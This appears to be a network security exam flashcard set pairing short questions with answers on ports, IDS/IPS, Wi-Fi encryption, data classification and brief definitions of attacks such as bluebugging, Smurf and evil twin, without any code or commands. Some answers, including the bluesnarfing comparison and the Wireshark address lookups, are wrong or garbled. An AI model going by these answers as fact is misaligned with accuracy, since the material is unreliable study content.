FINAL
What would a signal range for a Bluetooth device commonly be?
300 ft for 4.0
What would you use a bluebugging attack for?
A bluebugging attack is used to gain access to a smartphone in order to initiate a call out to the attacker's phone. This allows the attacker to listen to anything happening around the phone owner
XSS attack
A cross-site scripting attack is one that uses the web server to attack the client side
man-in-the-middle attack
A form of eavesdropping where the attacker makes an independent connection between two victims and steals information to use fraudulently.
1st type of ids
A host-based IDS watches activity on a local system, such as changes to critical system files. It may also watch log files or audit other system behaviors.
What tool could you use to enable sniffing on your wireless network to acquire all headers?
Airmon-ng
Smurf Attack
An attack that broadcasts a ping request to all computers on the network yet changes the address from which the request came to that of the target.
What can an intrusion prevention system do that an intrusion detection system can't?
Block or reject network traffic
Why is bluesnarfing potentially more dangerous than bluejacking from the standpoint of the victim?
Bluejacking receives while bluesnarfing sends.
Port 53
DNS (Domain Name System)
TCP vulnerabilities
Denial of Service Attacks
What type of attack is a compromise of availability?
DoS
How would you ensure that confidentiality is implemented in an organization?
Encryption
IP Vulnerabilities
Expose IoT
Restricted
Exposure of restricted data would have undesirable effects.
Port 21
FTP (File Transfer Protocol) Command
Port 20
FTP (File Transfer Protocol) Data
How to find the port address on Wireshark
Find the TCP packets and look at the TCP layer details
What is the purpose of a deauthentication attack?
Forcing stations to reauthenticate
How many stages are used in the WPA handshake?
Four
An intrusion detection system can perform which of the following functions?
Generate alerts on traffic
Port 80
HTTP (HyperText Transfer Protocol) - used for transferring web pages
Port 443
HTTPS (Hyper Text Transfer Protocol Secure) Secure communications
What protocol is used for a Smurf attack?
ICMP
WPA2 (Wi-Fi Protected Access 2)
IEEE 802.11i-2004
What is the purpose of performing a Bluetooth scan?
Identifying endpoint
What is Weak in WEP
Initialization Vector
If you were implementing defense in breadth, what might you do?
Introduce a DevSecOps culture
IPS
Intrusion Prevention System will drop and reject malicious traffic
ARP Poisoning
Occurs con the Communication Layer The attacker use the same LAN. The attacker associates his MAC address with the IP address of the target so that any traffic meant for the target is received by the attacker.
What types of authentication are allowed in a WPA-encrypted network?
Personal and enterprise
What are the phases of the ISO 27001 cycle?
Plan, Do, Check, Act
How would you calculate risk?
Probability * loss value
Port 25
SMTP (Simple Mail Transfer Protocol) Routing mail between mail servers
Port 22
SSH (Secure Shell) Secure login, file transfer and port fowarding
TCP 3-way handshake
Sender sends a SYN, Receiver sends a SYNACK, Sender sends an ACK
Fraggle Attack
Smurf attack variation that uses UDP instead of ICMP.
Which of the following products might be used as an intrusion detection system?
Snort
How does an evil twin attack work?
Spoofing an SSID
UDP vulnerability
Spoofing and DOS attacks
How to find the destination address on Wireshark
Statics, Conversations, Ethernet TAP
DNS Poisoning
Technique used by criminals to alter DNS records and drive users to fake sites, to committing phishing.
Port 23
Telnet Unencrypted text communications
TCP SYN Attack
The connection stays open because the ACK from the sender was never sent. Since the connection is open give space for a lot of other connections to stay half open and confuse the server.
Confidential
The exposure of confidential information would cause damage to national security.
Secret
The exposure of secret information would cause serious damage to national security.
Top secret
The highest level of data classification. Only a very limited number of people will be able to look at data classified as top secret.
If you were to see that someone was using OpenVAS, followed by Nessus, what might you assume?
They were trying to reduce false positives
Official
This is information that relates to government business and may not be an indicator of the potential for harm if the information were lost or exposed.
What would be necessary for a TCP conversation to be considered ESTABLISHED by a stateful firewall?
Three-way handshake complete
Which information would a packet filter use to make decisions about what traffic to allow into the network?
UDP source port
Unclassified
Unclassified information can be viewed by everyone. This may include declassified information that was once considered a higher classification but the threat posed by its exposure has subsided.
To remove malware from the network before it gets to the endpoint, you would use which of the following?
Unified threat management appliance
What important event can be exposed by enabling auditing?
User login
How to find the source address on Wireshark
View and Analyze the frame, look at the address resolution protocol section
Which of these isn't an example of an attack that compromises integrity?
Watering hole
Which of these is an example of an application layer gateway?
Web application firewall
WPA2
WiFi Protected Access 2
WPA
Wifi Protected Access: use the TKIP encryption method. It was designed to replace WEP. use RC4 stream cipher
What tool would allow you to run an evil twin attack?
Wifiphisher
WEP
Wired Equivalence Protocol.
What would be a reason to use the Override feature in OpenVAS?
You want to change a severity rating on a finding.
2nd type of IDS
a network IDS can take some of the same sorts of rules and generate log messages.
Fragmentation Attack
attacks can be used to evade network security mechanisms simply because these devices, when they are inline, would take time to reassemble the messages before the adversarial activity would be seen. This reassembly takes time and so some devices just don't bother because the reassembly and detection can add latency to communications.
Land Attack
sets the source and destination information of a TCP segment to be the same. This sends the segment into a loop in the operating system, as it is processed as an outbound, then an inbound, and so forth. This loop would lock up the system.
Evil Twin Attack
uses a rogue access point to pretend to be a legitimate network
